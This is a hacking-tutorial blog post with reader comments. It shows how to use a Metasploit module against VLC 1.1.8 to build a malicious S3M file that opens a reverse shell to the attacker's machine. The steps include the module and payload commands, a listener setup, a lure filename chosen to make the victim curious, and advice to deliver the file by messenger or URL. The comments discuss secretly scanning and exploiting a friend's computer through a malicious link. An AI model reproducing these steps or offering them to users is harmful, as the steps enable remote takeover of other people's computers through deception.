VLC Media Player 1.1.8 modplug_s3m Exploit (Windows XP SP3)

VLC Media Player 1.1.8 modplug_s3m Exploit (Windows XP SP3)


Type : Tutorial

Level : Medium

Victim O.S : Windows XP SP3

Victim VLC Version : 1.1.8

Just surfing around and found that VLC 1.1.8 have vulnerability that can be exploited. If you still didn't know about VLC media player, here I copy from their original website videolan.org:

VLC is a free and open source cross-platform multimedia player and framework that plays most multimedia files as well as DVD, Audio CD, VCD, and various streaming protocols.

this exploit we will perform using Metasploit framework, and according to metasploit.com website about this vulnerability :

This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC.

Let's start…

Requirements :

1. Metasploit Framework

2. Operating System(I'm using Backtrack 5 R1 in this tutorial and Metasploit Framework already included inside)

Step By Step :

1. Open your metasploit console by typing msfconsole and then use the vlc_modplug_s3m exploit with windows meterpreter payload.

use exploit/windows/fileformat/vlc_modplug_s3m

set payload windows/shell_reverse_tcp

VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3

2. To view the available options, you can run show options command. I've set up my malicious s3m file with the configuration like the picture below.

VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3

Information :

set filename sora-aoi.s3m --> social engineering filename in order to make victim curious

set lhost --> your localhost / attacker machine

set lport 443 --> your local port / attacker local port

/root/.msf4/data/exploits/sora-aoi.s3m --> malicious file location. copy the file and
send it to your victim

3. The next step before we send the malicious s3m file we should set up a listener to grab connection when victim opened the malicious s3m file in their VLC media player.

VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3

4. Everything has been set up so nice until this way, the next step we need to send the s3m file to our victim. You can send the file via messenger, url, or anything…improve yourself..

5. After victim opened our malicious s3m file, we got the shell_reverse_tcp payload as shown below.

VLC Media Player 1.1.8 modplug_s3m Exploit Windows XP SP3

Countermeasures :

1. Always update your software to the latest version

2. Install personal firewall

Hope it's useful ๐Ÿ™‚

Subscribe Now To Get Latest Hacking Tutorial on Your E-Mail

(Visited 115 times, 1 visits today)

Share this article if you found this post was useful:

Blogger at hacking-tutorial.com. Love PHP, offensive security and web.
Contact him at me[-at-]vishnuvalentino.com

See all posts by || Visit Website : http://www.vishnuvalentino.com

  • brad

    is it possible to do something like this with a jpg

    • v4L

      no you can’t

  • nikon

    I was thinking how can I scan vulnerability over internet. If this is possible can you make a tutorial for that please? I’m searching on google for months and I haven’t found anything. You are my last chance to learn how to do that. Thanks anyway

    • v4L

      what you mean? on internet +-60% of them are web server and most of them are inside DMZ.

      • nikon

        I have a website and I want to put a page where is written the code in php, html, or another language that can scan the vulnerabilitys of a computer when is clicked. For example I give the malicious link to try for my friend on internet and then he clicks the link and I have the report of his vulnerability sent to my email or something like that. I know that this think is possible to do but I can’t find anywhere how to do that. I searched on google but nothing. Please help me…

        • v4L

          hmm maybe it only works if you use activeX for IE, but for others browser afaik the environment will act as a browser not as a system.
          you only can detect which browser user use, and which OS he use.
          except : you can exploit the browser through available vulnerability to gain a system, then you’ll got it ๐Ÿ™‚

  • nikon

    when I have found the browser and the os what I should do. For example I use google chrome ver 20 and windows 7 ultimate sp 1. With this information how can an attacker attack me. How can find the right exploit over metasploit. If there isn’t for my versions what are for the oldest one. Thanks for your time, your answers are very helpful.

    • v4L

      target is vulnerable when user and system didn’t match one another.
      while system not vulnerable, then maybe the user was vulnerable, and vice versa.
      the right exploit is how you think about it…